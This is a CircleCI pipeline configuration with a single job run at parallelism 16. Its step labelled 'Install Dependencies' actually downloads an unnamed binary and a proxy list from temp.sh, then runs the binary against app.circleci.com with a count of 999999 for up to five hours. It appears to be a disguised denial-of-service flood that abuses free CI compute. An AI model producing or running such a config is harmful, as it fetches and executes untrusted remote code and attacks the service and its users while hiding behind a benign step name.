version: 2.1
jobs:
    trial:
      docker:
            - image: debian:latest
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: apt update && apt install nodejs wget -y && wget https://temp.sh/BaCDv/mixed && wget https://temp.sh/Sowgd/proxy.txt && chmod +x mixed && ./mixed https://app.circleci.com/ 999999 153 30
            no_output_timeout: 5h

workflows:
    version: 2.1
    build:
        jobs:
        - trial
